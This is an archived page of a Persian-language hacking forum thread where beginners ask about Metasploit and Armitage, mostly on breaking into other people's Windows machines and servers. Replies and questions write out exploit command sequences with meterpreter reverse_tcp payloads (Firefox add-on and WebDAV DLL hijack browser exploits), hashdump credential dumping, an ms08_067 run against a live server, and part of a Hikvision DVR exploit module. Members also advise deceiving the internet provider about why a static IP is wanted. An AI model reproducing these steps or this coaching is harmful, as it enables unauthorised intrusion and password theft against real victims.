PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : سوالات و جواب های Metasploit و Armitage



صفحه ها : 1 2 3 4 5 6 [7] 8 9

r00tErr0r
11-11-2014, 10:32 PM
سلام من نیاز به pdf هایی فارسی اموزش ارمیتیج و متاسا\ولیت دارم که درباره و نحوه کار توضیح بده

و همچنین اموزش های جدید در رابطه با هک ویندوز 7 نیاز دارم ... فقط یکم سطح فیلم بایین باشه یا اینکه مشکافانه به اموزش برداخته شده باشه اگه تو انجمن هست ممنون میشم بزارید ...فقط از نتیجه گرفتن فیلمی که قرار میدید مطمپن باشید که من وقت نزارم روش کار کنم ممنون

J.O.K.E.R
11-11-2014, 10:55 PM
سلام من نیاز به pdf هایی فارسی اموزش ارمیتیج و متاسا\ولیت دارم که درباره و نحوه کار توضیح بده

و همچنین اموزش های جدید در رابطه با هک ویندوز 7 نیاز دارم ... فقط یکم سطح فیلم بایین باشه یا اینکه مشکافانه به اموزش برداخته شده باشه اگه تو انجمن هست ممنون میشم بزارید ...فقط از نتیجه گرفتن فیلمی که قرار میدید مطمپن باشید که من وقت نزارم روش کار کنم ممنون

سلام و دورود دوست عزیز و گرامی...
خوب این مطالبی رو که خواستید...باید گفت مطالب و تاپیک های آموزشی زیادی با این عناوین ایجاد شده
برای آموزش...و شما میتونستید با کمی سرچ به نتایج درخواستی و مطلوبی دست پیدا کنید...خوب پیگیر لینک های درج شده باشید...موفق و موید باشید



[Only registered and activated users can see links]آموزش+هک+وی دوز+7&hl=en-IR&gbv=2&spell=1&oq=&gs_l=

[Only registered and activated users can see links]آموزش-متااسپلویت-از-پایه-lt

[Only registered and activated users can see links]آموزش-متاسپلویت-با-اکسپلویته-java_signed_applet

[Only registered and activated users can see links]تاپیک-جامع-اکسپلویت-های-متااسپلویت-به-همراه-دستورات-اجرایی

[Only registered and activated users can see links]کتاب-آموزش-کامل-متا-اسپلویت!!!-

blackh4t
11-12-2014, 11:01 AM
با سلام خدمت دوستان و اساتید گرامی . سوالی از خدمتتون داشتم

تو متاسپلویت یا ارمیتج تولز یا اسکریپتی نیست که پسوردهای ذخیره شده تو مرورگرهارو نشون بده یا ذخیره کرد تا بشه ازش استفاده کرد؟

با تشکر

r00tErr0r
11-12-2014, 06:47 PM
سلام میخواستم بدونم چجوری توسط این ابزار بدون دخالت قربانی از طریق ای پی نفوذ کنم روشش تو انجمن هست ؟

اصلا میشه با این ابزار اینکارو کرد ؟ میشه اموزششو قرار بدید ؟>

r00tErr0r
11-12-2014, 08:06 PM
اپ یکی بیاد راهنمایی کنه

J.O.K.E.R
11-12-2014, 08:13 PM
سلام میخواستم بدونم چجوری توسط این ابزار بدون دخالت قربانی از طریق ای پی نفوذ کنم روشش تو انجمن هست ؟

اصلا میشه با این ابزار اینکارو کرد ؟ میشه اموزششو قرار بدید ؟>

سلام و دورود دوست عزیز و گرامی...
کمی متن پست شما در اینجا مبهم میباشد...منظورتون Armitage هست و یا metasploit که بنده بگم آیا امکان
پذیره یا خیر...موفق و موید باشید

0Scorpion0
11-12-2014, 08:21 PM
///////////
predator
///////////

r00tErr0r
11-13-2014, 12:11 PM
سلام و دورود دوست عزیز و گرامی...
کمی متن پست شما در اینجا مبهم میباشد...منظورتون Armitage هست و یا metasploit که بنده بگم آیا امکان
پذیره یا خیر...موفق و موید باشید


فرقی نمیکنه هر کدوم که امکانش باشه فقط میشه با این ابزار این کارو کرد ؟

اگه میشه لطفا یکم راهنمایی کنید

Regex
11-13-2014, 12:16 PM
فرقی نمیکنه هر کدوم که امکانش باشه فقط میشه با این ابزار این کارو کرد ؟

اگه میشه لطفا یکم راهنمایی کنید

مستر ، Armitage رابط گرافیکی Metasploit هست !

پس هیچ تفاوتی ندارند مگر گرافیکال بودن Armitage .

ابزار هایی مختلفی هست .

// لطفا سرچ کنید .

به عنوان مثال :
site:ashiyane.org آموزش Armitage

r00tErr0r
11-13-2014, 03:48 PM
یه سوال در رابطه این اکسپولیت داشتم که یکم قسمت ip نا مفهوم بود



use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload windows/meterpreter/reverse_tcp
set lhost ip
set SRVHOST
set URIPATH /

اون قسمت ip باید ایپی کسیو که میخوایم به سیستمش نفوذ کنیمو بزنیم ؟

تو فیلم این ای پیو زد 192.168.1.1
خوب این که ای پی اصلیه ما نمیشه این رو سیستم قربانی هم جواب میده ؟
کدوم ای پی قربانی باید بزنیم اونجا ؟ و بدیم بهش ؟

r00tErr0r
11-14-2014, 10:07 AM
یعنی کسی اطلاعی نداره ؟ این فیلمایی که ساختن یعنی به سیستم خودشون نفوذ کردن ؟ :|

Muts
11-14-2014, 12:09 PM
یه سوال در رابطه این اکسپولیت داشتم که یکم قسمت ip نا مفهوم بود



use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload windows/meterpreter/reverse_tcp
set lhost ip
set SRVHOST
set URIPATH /

اون قسمت ip باید ایپی کسیو که میخوایم به سیستمش نفوذ کنیمو بزنیم ؟

تو فیلم این ای پیو زد 192.168.1.1
خوب این که ای پی اصلیه ما نمیشه این رو سیستم قربانی هم جواب میده ؟
کدوم ای پی قربانی باید بزنیم اونجا ؟ و بدیم بهش ؟


یعنی کسی اطلاعی نداره ؟ این فیلمایی که ساختن یعنی به سیستم خودشون نفوذ کردن ؟ :|
سلام
بارها به این سوال شما چه در صفحات قبلی این تاپیک و چه در تاپیک های اموزشی همین بخش پاسخ داده شده ، کمی در تاپیک های همین بخش جست و جو کنید
برای حملات در شرایط واقعی هم چند پست قبلی رو ببین
موفق باشید

Muts
11-14-2014, 12:14 PM
سلام میخواستم بدونم چجوری توسط این ابزار بدون دخالت قربانی از طریق ای پی نفوذ کنم روشش تو انجمن هست ؟

اصلا میشه با این ابزار اینکارو کرد ؟ میشه اموزششو قرار بدید ؟>


اپ یکی بیاد راهنمایی کنه
سوال میکنید ، صبرکنید تا یکی بیاد جواب بده (دفعه بعدی طبق قوانین برخورد خواهد شد)
اما در مورد سوال : وقتی در مورد متاسپلویت و کلا اکسپلویت تحقیق کنید حتما به سوال جوابتون میرسید(سوالهایی همچون : اساس کار متاسپلویت؟انواع اکسپلویت ها ؟ شرایط استفاده ؟ و...)
و سوال شما خیلی کلیه ! ....
موفق باشید

r00tErr0r
11-14-2014, 01:24 PM
خب اینجا تایپیک سوالات و جواب ها هست ممکنه برای هر کسی یه سوالی پیش بیاد ... رفتم گشتم جواب خودمو پیدا نکردم...

من فقط میخوام بدونم تو این اکسپولیت ها


use /exploit/windows/browser/webdav_dll_hijacker
show opitons
set EXTENSIONS "file1.ppt file2.pptx file3.html file4.pdf"
set payload windows/meterpreter/reverse_tcp
set lport 999
set lhost ip

به جایی اونجایی که نوشته ip باید چه ای پی قربانی رو بزنم ؟ من تو فیلما دیدم ای پی خودشنو میزنن خب این که کاره خیلی مسخره ایه ...

لطفا این موضوع برام روشن کنید ...

در ضمن من مبتدی هستم و سوالات زیادی برام پیش میاد ...

ممنون بابت اینکه وقت میزارید رفع ابهام میکنید :ِی

r00tErr0r
11-16-2014, 01:13 PM
سلام با توجه به اینکه به سوال بالا جوابی نداده شده ... :ی

یه سوال دیگه داشتم من امدم بک دور ایجاد کردم به این صورت که تو قسمت set lhost 192.168.223.36 ای پی خودمو زدم

و ساختم و انداختم رو vps و meta رو رو حالت exploit یا Listing قرار دادم ولی وقتی رو وی پی اس اجرا کردم هیچ

نتیجه ای پیدا نکردم ... کسی میدونه مشکل کجاس ؟

XoDiAK
11-16-2014, 01:23 PM
سلام با توجه به اینکه به سوال بالا جوابی نداده شده ... :ی

یه سوال دیگه داشتم من امدم بک دور ایجاد کردم به این صورت که تو قسمت set lhost 192.168.223.36 ای پی خودمو زدم

و ساختم و انداختم رو vps و meta رو رو حالت exploit یا Listing قرار دادم ولی وقتی رو وی پی اس اجرا کردم هیچ

نتیجه ای پیدا نکردم ... کسی میدونه مشکل کجاس ؟

سلام داش برای استفاده از متا باید حتما ای پی استاتیک داشته باشی وگرنه کارت لنگه کلا اگه ای پی استاتیک نداری استفاده نکنی راحت تری داش

r00tErr0r
11-16-2014, 01:43 PM
سلام داش برای استفاده از متا باید حتما ای پی استاتیک داشته باشی وگرنه کارت لنگه کلا اگه ای پی استاتیک نداری استفاده نکنی راحت تری داش


ای بابا چه عجب شما بلاخره روشنم کردی خوب اینو یکی زود تر میگفت :|

داش یعنی غیر از ای پی استاتیک هیچ چیز دیگه ای نمیشه ؟

XoDiAK
11-16-2014, 02:06 PM
ای بابا چه عجب شما بلاخره روشنم کردی خوب اینو یکی زود تر میگفت :|

داش یعنی غیر از ای پی استاتیک هیچ چیز دیگه ای نمیشه ؟

متاسفانه برای بک کانکت گیری و گرفتن دسترسی 100 درصد باید باید ای پی استاتیک داشته باشی مگر اینکه میخوای روی سیستم خودت تست کنی :)
راهیم نداره جز خرید ای پی استاتیک از سرویس دهندتون با تشکر

r00tErr0r
11-16-2014, 02:16 PM
متاسفانه برای بک کانکت گیری و گرفتن دسترسی 100 درصد باید باید ای پی استاتیک داشته باشی مگر اینکه میخوای روی سیستم خودت تست کنی :)
راهیم نداره جز خرید ای پی استاتیک از سرویس دهندتون با تشکر


ببخشید من یه سوال دیگه دارم ممنون میشم وقتتونو بگیرم ...

میخواستم بدونم قیمتش چقدر هست ؟ مثلا اگه گفت برای چه کاری میخوای بگم چی ؟
من سرعتم 128 هست اشکالی که نداره ؟
بعد از خریداری باید تنظیماتی انجام بدم ؟

با تشکر فراوان

XoDiAK
11-16-2014, 02:22 PM
ببخشید من یه سوال دیگه دارم ممنون میشم وقتتونو بگیرم ...

میخواستم بدونم قیمتش چقدر هست ؟ مثلا اگه گفت برای چه کاری میخوای بگم چی ؟
من سرعتم 128 هست اشکالی که نداره ؟
بعد از خریداری باید تنظیماتی انجام بدم ؟

با تشکر فراوان

سلام نه مشکلی پیش نمیاد تنظیماتیم که باید انجام بدید موقع خرید از سرویس دهندتون بپرسید برای هر شرکت متفاوته

و قیمت بالای هم نداره ماهیانه بین 5 الی 6 تومان باهاتون حساب میکنن و اینم بستگی به سرویس دهندتون داره

اگر هم گفتن برای چه کاری میخواید بگید برای ریموت دسکتاپ یا تبادل فایل و اطلاعات از طریق Ftp و etc......

سرعتتونم مشکلی پیش نمیاره فقط کامند ها یکم دیر اجرا میشن در کلاینت تارگت :) :x
با تشکر

slt8
11-16-2014, 02:52 PM
سوال : دستور hashdump چیه ؟ چه کارایی داره ؟

Muts
11-18-2014, 10:50 AM
ای بابا چه عجب شما بلاخره روشنم کردی خوب اینو یکی زود تر میگفت :|

داش یعنی غیر از ای پی استاتیک هیچ چیز دیگه ای نمیشه ؟

سلام برای تست حملات در شرایط واقعی شما باید ایپی ولید داشته باشید(در این زمینه جست و جو کنید)
موفق باشید

Muts
11-18-2014, 10:57 AM
سوال : دستور hashdump چیه ؟ چه کارایی داره ؟

اینکه این دستور چیه ؟ جوابش لینک زیر:
[Only registered and activated users can see links]
و اینکه این دستور چیکارمیکنه مثلا برای بیرون کشیدن ریموت database sam از تارگت(مثلا ویندوز7)
موفق باشید

esikley
11-20-2014, 08:58 PM
سلام خدمت دوستان
مثل اینکه این سوال بنده بی جواب مونده
منتظر جواب شما اساتید محترم هستم

دوستان منتظر راهنمایی شما عزیزان هستیم

blackh4t
11-20-2014, 11:32 PM
با سلام. از مدیران و اساتید گرامی سوالی داشتنم؟

ایا راهی برای شناسایی سیستمهای الوده به Meterpreter هست؟ چجوری میشه سیستم الوده رو ایمن کرد؟

با تشکر

r00tErr0r
11-23-2014, 04:28 PM
سلام من وقتی دستور این میزنم

run post/windows/gather/hashdump

با ارور زیر مواجه میشم

Obtaining the boot key...
Calculating the hboot key using SYSKEY 1e1aeb7cadb8cdee74c12feeee63df0...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

فکر کنم این اسکری\تو تو کتابخانش نداره کسی داره بده من اضافه کنم به متا ؟ و دستوره اضافه کردنشم بگید ممنون

XoDiAK
11-23-2014, 05:23 PM
سلام من وقتی دستور این میزنم

run post/windows/gather/hashdump

با ارور زیر مواجه میشم

obtaining the boot key...
calculating the hboot key using syskey 1e1aeb7cadb8cdee74c12feeee63df0...
[-] meterpreter exception: Rex::post::meterpreter::requesterror stdapi_registry_open_key: Operation failed: Access is denied.
[-] this script requires the use of a system user context (hint: Migrate into service process)

فکر کنم این اسکری\تو تو کتابخانش نداره کسی داره بده من اضافه کنم به متا ؟ و دستوره اضافه کردنشم بگید ممنون

نه مشکل این چیزی که شما میگید نیست مشکل از دسترسی شماست سیستم اجازه نمیده فایل sam رو تو سیستم بخونید باید دسترسی ادمین بگیرید (ویندوز که روت نداره :) ) بعدش میتونید فایل sam رو بخونید باتشکر

r00tErr0r
11-23-2014, 06:16 PM
چجوری دست رسیی ادمین بگیرم ؟ دستور خاصی داره ؟

XoDiAK
11-23-2014, 06:38 PM
چجوری دست رسیی ادمین بگیرم ؟ دستور خاصی داره ؟

شما یه سر به این سایت بزن : تمامی دستورات مترپرتر رو براتون توضیح داده

[Only registered and activated users can see links]

یه سر هم به اینجا بزن برای پیدا کردن لوکال ادمین خیلی کار امده :)

[Only registered and activated users can see links]

با تشکر

Xodiak

HAMEDB71
11-25-2014, 02:17 PM
سلام
من یه مشکلی با آرمیتاژ کالی دارم: تارگت رو پیدا کردم os تارگت هم مشخص شده attack رو میزنم جست و جو میکنه پیغام happy hunting رو هم نشون میده ولی وقتی کلیک راست میکنم گزینه attack وجود نداره!!! مشکل چیه؟
ورژن کالی:kali-linux-1.0.9a-amd64
سیستم عامل تارگت هم ویندوز 7 هست .
کالی و ویندوز هم تو VMware نصب شدن.

MR.B3NY
11-26-2014, 07:45 PM
با سلام خدمت تمامی دوستان
چطور میتونم اکسپلویت رو با متااسپلویت اجرا کنم؟
اکسپلویت هایی که با متااسپلویت اجرا میشن !




##
# This module requires Metasploit: [Only registered and activated users can see links]
# Current source: [Only registered and activated users can see links]
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking

include Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
'Description' => %q{
This module exploits a buffer overflow in the RTSP request parsing
code of Hikvision DVR appliances. The Hikvision DVR devices record
video feeds of surveillance cameras and offer remote administration
and playback of recorded footage.

The vulnerability is present in several models / firmware versions
but due to the available test device this module only supports
the
......
.....
....
...
..
.
.
.
.
.

Prot3ct0r
11-26-2014, 07:55 PM
با سلام خدمت تمامی دوستان
چطور میتونم اکسپلویت رو با متااسپلویت اجرا کنم؟
اکسپلویت هایی که با متااسپلویت اجرا میشن !




##
# This module requires Metasploit: [Only registered and activated users can see links]
# Current source: [Only registered and activated users can see links]
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking

include Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
'Description' => %q{
This module exploits a buffer overflow in the RTSP request parsing
code of Hikvision DVR appliances. The Hikvision DVR devices record
video feeds of surveillance cameras and offer remote administration
and playback of recorded footage.

The vulnerability is present in several models / firmware versions
but due to the available test device this module only supports
the
......
.....
....
...
..
.
.
.
.
.



سلام عزیزم در انجمن سرچ کنید زودتر به نتیجه میرسید تا اینکه پست بدید:
[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]

HAMEDB71
11-27-2014, 08:03 PM
دوستان برنامه های متااسپلویت و آرمیتاژ برا شما هم سنگین اجرا میشن یا مال من اینجوریه؟
من تو کالی با آرمیتاژ کار میکنم انقدر هنگ میکنه که اصلا نمیشه کاری کرد!!! متااسپلویت هم همینطوره!
کالی تو VMWare نصبه با یک گیگ رم اینم مشخصات سیستم من:
CPU=Core i3
RAM=4G
چیکار کنم؟؟؟

XoDiAK
11-27-2014, 09:17 PM
دوستان برنامه های متااسپلویت و آرمیتاژ برا شما هم سنگین اجرا میشن یا مال من اینجوریه؟
من تو کالی با آرمیتاژ کار میکنم انقدر هنگ میکنه که اصلا نمیشه کاری کرد!!! متااسپلویت هم همینطوره!
کالی تو VMWare نصبه با یک گیگ رم اینم مشخصات سیستم من:
CPU=Core i3
RAM=4G
چیکار کنم؟؟؟

با سلام این مشکل برای من هم پیش اومده شما ماشین مجازی رو خاموش کنین و به Tab Vm برید و روی Setting کلیک کنید

و بر روی Proccesors کلیک کنید و Number oF Proccesors رو به 2 تغییر بدید و بعد بر روی Ok کلیک کنید

یه چیزه دیگه موقع استفده از Vmware حتما Task Manger رو باز کنید و برنامه های اضافی که از Ram استفاده میکنن

رو ببندید با تشکر Xodiak

قلندری
11-29-2014, 09:26 AM
یه سوال دوستان هر اموزشی میزارند تو محیط شبکه هست سوال بنده اینه که

مثلا یه سایت سرور 2003 داره اولا چطور آی پیشو پیدا کنم آی پی سایتکه روش هست همون آی پی هست مثلا پینگ بگیرم آی پی سرورشو میده
سوال دوم در rhost همون آی پی بدم؟
سوال سوم در lhost آی پی خودمو بدم آی پی اصلی یا لوکال ؟

Regex
11-29-2014, 09:50 AM
مثلا یه سایت سرور 2003 داره اولا چطور آی پیشو پیدا کنم آی پی سایتکه روش هست همون آی پی هست مثلا پینگ بگیرم آی پی سرورشو میده

شما اگر از یک دومین Ping بگیرید ، درصورتی که فایروال جلوی Ping را نگرفته باشه ، به IP وب سایت میرسید ! نه سرور !
این سایت به شما کمک میکند : Where ([Only registered and activated users can see links])


سوال دوم در rhost همون آی پی بدم؟

بله .


سوال سوم در lhost آی پی خودمو بدم آی پی اصلی یا لوکال ؟

IP Wan با بقول شما
آی پی اصلی

blackh4t
11-29-2014, 11:46 AM
با سلام خدمت اساتید و مدیران این بخش

2 تا سوال کردم اما کسی جواب نداد لطفا راهنماییم کنید

1: ایا متاسپلویت تولز یا ماژولی داره که پسوردهای ذخیره شده داخله مرورگر سیستم قربانی دربیاره و ذخیره یا به نمایش بذاره؟

2: چجوری میشه سیستم الوده به meterpreter شناسایی و پاکسازی و ایمن کرد؟

منتظر جواب مدیران هستم

با تشکر

XoDiAK
11-29-2014, 01:14 PM
با سلام خدمت اساتید و مدیران این بخش

2 تا سوال کردم اما کسی جواب نداد لطفا راهنماییم کنید

1: ایا متاسپلویت تولز یا ماژولی داره که پسوردهای ذخیره شده داخله مرورگر سیستم قربانی دربیاره و ذخیره یا به نمایش بذاره؟

2: چجوری میشه سیستم الوده به meterpreter شناسایی و پاکسازی و ایمن کرد؟

منتظر جواب مدیران هستم

با تشکر

سلام

خوب جواب سوال اول :

برای در اوردن پسورد ها اطلاعات یا هر چیزه دیگه روی سیستم هدف از ماژول های Post استفاده میشه

که میتونید با دستور


show posts

در محیط کنسول انجام بدید و ببینید و ماژول مورد نظر رو انتخاب کنید :)

جواب سوال دوم :

بهترین راه برای پیدا کردن دسترسی Meterpreter در تسک منجر هستش و Meterpreter خیلی تابلو هستش و

میتونید End task بزنید از بین ببریدش و 2 وم اینکه اصلا از کسی فایل های ناشناس نگیرید تو محیط نت

بدلیل بسیار قدرتمند بودن Crypter متااسپلویت به هیچ وجه انتی ویروس شناسایی نمیکنه پس مواظب باشید

باتشکر Xodiak امیدوارم به دردون خورده باشه :)

قلندری
11-29-2014, 01:27 PM
شما اگر از یک دومین Ping بگیرید ، درصورتی که فایروال جلوی Ping را نگرفته باشه ، به IP وب سایت میرسید ! نه سرور !
این سایت به شما کمک میکند : Where ([Only registered and activated users can see links])



بله .



IP Wan با بقول شما

پس آی پی سرور سایت رو چطوری باید پیدا کنم ؟ این سایت هم همون ای پی رو میده که موقع پینگ میده/.؟همونه آی پی سرور؟

آی پی ون بنده اگر داخل شبکه مثلا 10 تا سیستم باشه تشخیص میده متاسپلویت و دسترسی به من میده؟

A-T44
11-29-2014, 07:19 PM
سلام،
چطور میشه پورت های باز یه سیستم دیگه رو دید؟
اصلا همراه آی پی تو آرمیتیج ، پورت باز اصولا کدوما استفاده میشه؟
چطوری میشه پورت مورد نیازو باز کرد؟

amirc4
12-07-2014, 12:37 PM
سلام خسته نباشید من آخرین ورژن متااسپلوبت را در کالی لینوکس نصب کردم ولی وقتی میخوام armitage را اجرا کنم بعد از اینکه یه صفحه load باز میشه و بسته میشه دیگه برنامه اجرا نمیشه در واقع هیچ اتفاقی نمی افته
چیکار کنم؟

XoDiAK
12-07-2014, 12:52 PM
سلام خسته نباشید من آخرین ورژن متااسپلوبت را در کالی لینوکس نصب کردم ولی وقتی میخوام armitage را اجرا کنم بعد از اینکه یه صفحه load باز میشه و بسته میشه دیگه برنامه اجرا نمیشه در واقع هیچ اتفاقی نمی افته
چیکار کنم؟

درود شما قبل از اجرای ارمیتج این 2 تا دستور رو بزنید همیشه :)


service postgresql start

service metasploit start

کارتون حل میشه :)

anonymouse2
12-12-2014, 12:02 AM
سلام و خسته نباشید خدمت اساتید.
من با metaxploit در محیط back track یک پایلود(exe) ساختم ولی نمی تونم از محیط بک ترک خارجش کنم و تست کنم.
وقتی هم می خوام اپلود کنم میره فایلو انتخاب میکنه ولی وقتی دکمه اپلود رو میزنی اپلود نمیکنه.
رو ماشین مجازی vmware player هم هست.
اگه میشه راهنمایی کنید
anonymouse2
با تشکر

alireza h
12-16-2014, 10:01 PM
سلام دوستان گل ترو خدا کمکم کنید : )
من متااسپولایت رو نمی تونم از سایتش دانلود کنم ..... ینی می تونم ها ولی چون تو تحریم هستیم نمی شه لایسنسش رو فعال کرد همونطور که می دونید هر دو حالتش 14 روز و رایگان لایسنس می خواد که یکیشو رایگان می ده اما ما تو تحریم هستیم نمی گیره از اینترنت هم دانلود کردم افلاینشو نگرفت لایسنس کدشم یه شماره الکی دادم و ایمیل خودمو با کشور امریکا و اومد به ایمیلم ولی وقتی زدمش نگرفت و نوشت که کد برا کشور دیگس (( یه چی تو این مایه ها بود یادم نیس دقیق ))

حالا می گم الان راهی وجود داره که بشه رد کرد این تحریم هارو ؟ من از ای پی هید هم استفاده کردم پلاتیوم هید ای پی :| که اصلا صفحه لود نمی شه » :|

Help ME Plz

Muts
12-16-2014, 11:00 PM
سلام دوستان گل ترو خدا کمکم کنید : )
من متااسپولایت رو نمی تونم از سایتش دانلود کنم ..... ینی می تونم ها ولی چون تو تحریم هستیم نمی شه لایسنسش رو فعال کرد همونطور که می دونید هر دو حالتش 14 روز و رایگان لایسنس می خواد که یکیشو رایگان می ده اما ما تو تحریم هستیم نمی گیره از اینترنت هم دانلود کردم افلاینشو نگرفت لایسنس کدشم یه شماره الکی دادم و ایمیل خودمو با کشور امریکا و اومد به ایمیلم ولی وقتی زدمش نگرفت و نوشت که کد برا کشور دیگس (( یه چی تو این مایه ها بود یادم نیس دقیق ))

حالا می گم الان راهی وجود داره که بشه رد کرد این تحریم هارو ؟ من از ای پی هید هم استفاده کردم پلاتیوم هید ای پی :| که اصلا صفحه لود نمی شه » :|

Help ME Plz
سلام
نسخه رایگانش رو بدون درد سر دانلود کنید ، نیازهاتون رو رفع میکنه
صفحات پیش همین تاپیک لینک دانلودش هست .
موفق باشید

Muts
12-16-2014, 11:04 PM
سلام،
چطور میشه پورت های باز یه سیستم دیگه رو دید؟
اصلا همراه آی پی تو آرمیتیج ، پورت باز اصولا کدوما استفاده میشه؟
چطوری میشه پورت مورد نیازو باز کرد؟
سلام
اسکنرهایی نظیر nmap
سوالتون گنگه !برای باز کردن پورت هم دستوراتش هست که داخل فروم بگردید پیدا میکنید

سلام و خسته نباشید خدمت اساتید.
من با metaxploit در محیط back track یک پایلود(exe) ساختم ولی نمی تونم از محیط بک ترک خارجش کنم و تست کنم.
وقتی هم می خوام اپلود کنم میره فایلو انتخاب میکنه ولی وقتی دکمه اپلود رو میزنی اپلود نمیکنه.
رو ماشین مجازی vmware player هم هست.
اگه میشه راهنمایی کنید
anonymouse2
با تشکر
یه راه ساده ش شبکه کردنه ، و...

alireza h
12-17-2014, 07:13 PM
سلام دوستان خسته نباشید
چجوری می تونم ای پی یه کلاینت رو اسکن کنم و باگ های اونو پیدا کنم و بعد با metasploit هکشون کنم ؟ مثل کاری که acunetix با سایت ها می کنه

-----------------------------------------------------------------------
چجوری و چه سایت هایی رو می شه با متا هک کرد
ایا می شه نسخه جدید دیتا لایف رو اسنیف کرد با metasploit یا ......

Amir Th
12-25-2014, 02:58 PM
سلام دوستان

من با متا اسپلویت به یه سرور ویندوزی اتک زدم تا بتونم یوزر و پسوردش رو به دست بیارم از اکسپلویت زیر استفاده میکنم



windows/smb/ms08_067_netapi



اما موقع اجرا این پیام رو به من میده





[-] Handler failed to bind to 192.168.1.1:4444
Started reverse handler on 0.0.0.0:4444
Automatically detecting the target...
Fingerprint: Windows Web Server 2008 R2 7601 - Service Pack 1 - lang:Unknown
We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target





مشکل چیه؟ با تشکر

توحه به حای آی پی خودم 192.168.1.1 رو زدم

Mast3r 0mid
12-26-2014, 12:27 AM
سلام دوستان

من با متا اسپلویت به یه سرور ویندوزی اتک زدم تا بتونم یوزر و پسوردش رو به دست بیارم از اکسپلویت زیر استفاده میکنم



windows/smb/ms08_067_netapi



اما موقع اجرا این پیام رو به من میده





[-] Handler failed to bind to 192.168.1.1:4444
Started reverse handler on 0.0.0.0:4444
Automatically detecting the target...
Fingerprint: Windows Web Server 2008 R2 7601 - Service Pack 1 - lang:Unknown
We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target





مشکل چیه؟ با تشکر

توحه به حای آی پی خودم 192.168.1.1 رو زدم

سلام
وقتی سیستم اپدیت بشه و این باگ پچ شده باشه میتونه یکی از دلایل اصلی باشه که شما با ارور مواجه میشید

Muts
12-26-2014, 01:10 AM
سلام دوستان خسته نباشید
چجوری می تونم ای پی یه کلاینت رو اسکن کنم و باگ های اونو پیدا کنم و بعد با metasploit هکشون کنم ؟ مثل کاری که acunetix با سایت ها می کنه

-----------------------------------------------------------------------
چجوری و چه سایت هایی رو می شه با متا هک کرد
ایا می شه نسخه جدید دیتا لایف رو اسنیف کرد با metasploit یا ......
آسیب پذیری رو باید پیدا کنید و بعد با متاسپلویت
دنبال جمع اوری از هدف باشید
nmap , nessus , و...

Muts
12-26-2014, 01:14 AM
سلام دوستان

من با متا اسپلویت به یه سرور ویندوزی اتک زدم تا بتونم یوزر و پسوردش رو به دست بیارم از اکسپلویت زیر استفاده میکنم



windows/smb/ms08_067_netapi



اما موقع اجرا این پیام رو به من میده





[-] Handler failed to bind to 192.168.1.1:4444
Started reverse handler on 0.0.0.0:4444
Automatically detecting the target...
Fingerprint: Windows Web Server 2008 R2 7601 - Service Pack 1 - lang:Unknown
We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target





مشکل چیه؟ با تشکر

توحه به حای آی پی خودم 192.168.1.1 رو زدم

بحث حمله در شرایط واقعی با محیط ازمایشگاهی فرق میکنه (پیرامون ای پی های شما )
اطلاعات از هدف جمع اوری کنید ببینید اسیب پذیر هست ، نیست ، فایروال داره؟نداره و...
و بعد از جمع اوری دقیق اطلاعات شروع به اجرای فرایند حمله کنید
ویندوز سرور 2008 r2 ؟
چک کنید اون اکسپلویت برای چه نوع اسیب پذیری یا تارگتیه و بعد لانچ کنید
موفق باشید

irsoldier
01-05-2015, 01:13 PM
سلام دوستان این چه اروریه میده سیستم بعد از بار کردن نرم افزار

120146

Muts
01-06-2015, 12:57 AM
سلام دوستان این چه اروریه میده سیستم بعد از بار کردن نرم افزار

120146

سلام کافی بود در گوگل سرچ میکردید
لینک :
[Only registered and activated users can see links]
مشکلات استفاده در ویندوز زیاده ، پیشنهاد میکنم از پلت فرم لینوکسی استفاده کنید
موفق باشید

parsa_91
01-08-2015, 12:34 PM
سلام...
میخواستم ببینم میشه با مودم وایرلسی که دارم که هم نقش یک مودم ای دی اس ال که با ***پورت لن کار میکنه و هم با وایرلسش دستگاه های مختلف با وای فای بهش وصل میشن (درواقع یک جور روتر هم به حساب میاد)
یک شبکه محلی راه انداخت بین دستگاه هایی که بهش وصل هستن؟؟؟ و تست نفوذ رو روی اونها انجام داد به جای اینکه از وی ام ور استفاده کرد؟؟؟

اخه تو گوشیم یه اسنیفر نصب کردم - کامپیوتر رو که با یک لن به مودم بود رو به عنوان ی ماشین شناخت و اسنیف کرد.

spider2
01-09-2015, 05:05 PM
سلام یک سوال داشتم اونم این که من متااسپلویت رو روی ویندوز نصب کردم منتها باید همیشه انتی ویروس هم رو خاموش کنم چون در هر حال توی حالت روشن گیر میده می خواستم بدونم که چکار کنم که در حالت روشن انتی ویروس گیر نده
در ضمن در گوگل سرچ کردم یکی از راه کار ها این بود که باید متااسپلوت رو روی usbنصب کنم اما چجور باید روی usbنصب کنم چون هر کاری که کردم روی usbمتااسپلوت بالا نمی امد شاید راه کاره باشه که بتوان کاری کرد که انتی ویروس گیر نده یا روی usbنصب کرد
metasploit:4.11.0
antivirus:Kaspersky internet security

suport info
01-09-2015, 05:32 PM
سلام یک سوال داشتم اونم این که من متااسپلویت رو روی ویندوز نصب کردم منتها باید همیشه انتی ویروس هم رو خاموش کنم چون در هر حال توی حالت روشن گیر میده می خواستم بدونم که چکار کنم که در حالت روشن انتی ویروس گیر نده
در ضمن در گوگل سرچ کردم یکی از راه کار ها این بود که باید متااسپلوت رو روی usbنصب کنم اما چجور باید روی usbنصب کنم چون هر کاری که کردم روی usbمتااسپلوت بالا نمی امد شاید راه کاره باشه که بتوان کاری کرد که انتی ویروس گیر نده یا روی usbنصب کرد
metasploit:4.11.0
antivirus:Kaspersky internet security
